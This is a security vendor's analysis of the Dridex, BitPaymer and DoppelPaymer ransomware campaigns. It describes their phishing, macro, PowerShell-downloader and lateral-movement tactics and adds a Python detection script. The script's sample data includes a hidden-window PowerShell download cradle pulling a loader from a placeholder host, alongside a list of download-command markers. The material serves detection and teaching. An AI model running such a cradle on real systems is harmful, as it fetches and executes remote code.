Ransomware Fix and Cyber Vaccines – Malware Analysis of Dridex, BitPaymer and DoppelPaymer campaign

BitPaymer and DoppelPaymer campaign

Threat actors are constantly working on new and more complex ways to deploy cyber-attacks. The affiliates behind Dridex initially used it to steal banking and personal credentials. To adapt to the changing cybercrime landscape, the threat actors evolved and developed BitPaymer ransomware, which repurposes Dridex for lateral movement and proliferation within a network. Just this past summer, malware analysts found a new evolution of BitPaymer ransomware, called DoppelPaymer.

This version of the ransomware campaign, although it looks very similar, is far more complex than BitPaymer. The LIFARS Incident Response Team summarizes the common initial stages of these ransomware infections, below.


“LIFARS.com announced the release of Cyber Vaccine, a new weapon against one of the most prolific organized crime phenomena of the 21st” (NBC2 News)


TTP – Tactics, Techniques, and Procedures.

The attackers use many types of malware and tools, in addition to Dridex, before and during the encryption incident. First, they infiltrate the network (usually via malspam email or other common and successful phishing tools). Then, they execute malicious code, which is usually hidden in VBA macros of the attached document(s) or in JavaScript code. This malicious code typically downloads the Dridex loader, either directly or via a PowerShell downloader that is fetched first and then retrieves the Dridex loader. These downloaders communicate with short-TTL (time to live), geofenced websites to download their payload.

The attackers need the connection only for a short time, even as little as one week after the phishing email is delivered. Once this initial download is successful, the attackers use PowerShell Empire and accessible SMB shares, RDP, etc. for lateral movement and spreading across the network (usually undetected by antivirus products and unmonitored network tools). They continue until the target number and types of machines are infected with Dridex. At this point, the malware lies in wait until the switch flips, the systems become encrypted, and the dreaded ransom note appears.
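The initial-access chain described above (macro or script launched from an Office document, a PowerShell downloader, and payload retrieval from short-TTL domains) leaves a recognisable footprint in endpoint telemetry. The following is an added example, not LIFARS tooling or code from the original article: it runs three defender-side heuristics over constructed, simplified process-creation and DNS events (the field names, thresholds, hostnames and command lines are all assumptions) and reports which hosts show more than one stage of the chain.

```python
"""Detection heuristics for the early stages of a Dridex-style intrusion.

Added illustration only: the events below are constructed and simplified
(Sysmon-like fields), not real telemetry, and the rule thresholds are
assumptions chosen for the example.
"""
from dataclasses import dataclass
from typing import Dict, List

# Office applications that should rarely spawn a script host directly.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
# Interpreters commonly launched by malicious macros or attached scripts.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe", "cmd.exe"}
# Substrings typical of PowerShell/LOLBin download cradles (matched case-insensitively).
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "iwr ", "net.webclient", "bitsadmin")
# DNS answers with a TTL at or below this (assumed) value are treated as short-lived.
LOW_TTL_SECONDS = 300


@dataclass
class ProcessEvent:
    host: str
    parent: str   # parent image name, e.g. "winword.exe"
    image: str    # child image name, e.g. "wscript.exe"
    cmdline: str


@dataclass
class DnsEvent:
    host: str
    query: str
    ttl: int      # TTL of the answer record in seconds


def office_spawned_script(e: ProcessEvent) -> bool:
    """Rule 1: an Office process launched a script host (macro execution)."""
    return e.parent.lower() in OFFICE_PARENTS and e.image.lower() in SCRIPT_HOSTS


def downloader_commandline(e: ProcessEvent) -> bool:
    """Rule 2: a script host command line contains a download cradle."""
    cmd = e.cmdline.lower()
    return e.image.lower() in SCRIPT_HOSTS and any(m in cmd for m in DOWNLOAD_MARKERS)


def short_ttl_lookup(e: DnsEvent) -> bool:
    """Rule 3: the host resolved a name whose answer has an unusually short TTL."""
    return e.ttl <= LOW_TTL_SECONDS


def score_events(proc: List[ProcessEvent], dns: List[DnsEvent]) -> Dict[str, List[str]]:
    """Return, per host, the sorted list of distinct rule names that fired."""
    hits: Dict[str, set] = {}
    for e in proc:
        if office_spawned_script(e):
            hits.setdefault(e.host, set()).add("office-spawned-script")
        if downloader_commandline(e):
            hits.setdefault(e.host, set()).add("downloader-commandline")
    for d in dns:
        if short_ttl_lookup(d):
            hits.setdefault(d.host, set()).add("short-ttl-dns")
    return {h: sorted(r) for h, r in hits.items()}


def hosts_with_chain(scored: Dict[str, List[str]], min_rules: int = 2) -> List[str]:
    """Hosts where at least `min_rules` distinct stages were observed together."""
    return sorted(h for h, rules in scored.items() if len(rules) >= min_rules)


# Constructed sample events: ws01 shows the full chain, ws02 shows benign activity.
SAMPLE_PROCESS_EVENTS = [
    ProcessEvent("ws01", "winword.exe", "wscript.exe", "wscript.exe //e:jscript invoice.js"),
    ProcessEvent("ws01", "wscript.exe", "powershell.exe",
                 "powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/ldr')\""),
    ProcessEvent("ws02", "explorer.exe", "winword.exe", "winword.exe report.docx"),
    ProcessEvent("ws02", "svchost.exe", "powershell.exe", "powershell -File update.ps1"),
]
SAMPLE_DNS_EVENTS = [
    DnsEvent("ws01", "example.invalid", 60),
    DnsEvent("ws02", "updates.example", 3600),
]

if __name__ == "__main__":
    scored = score_events(SAMPLE_PROCESS_EVENTS, SAMPLE_DNS_EVENTS)
    for host, rules in scored.items():
        print(f"{host}: {', '.join(rules)}")
    print("likely initial access on:", hosts_with_chain(scored))
```

Each rule on its own produces false positives (administrators do run PowerShell downloads, and CDNs use short TTLs); the value is in correlating several stages on the same host within a short window, which is why the example reports hosts where more than one rule fired rather than single events.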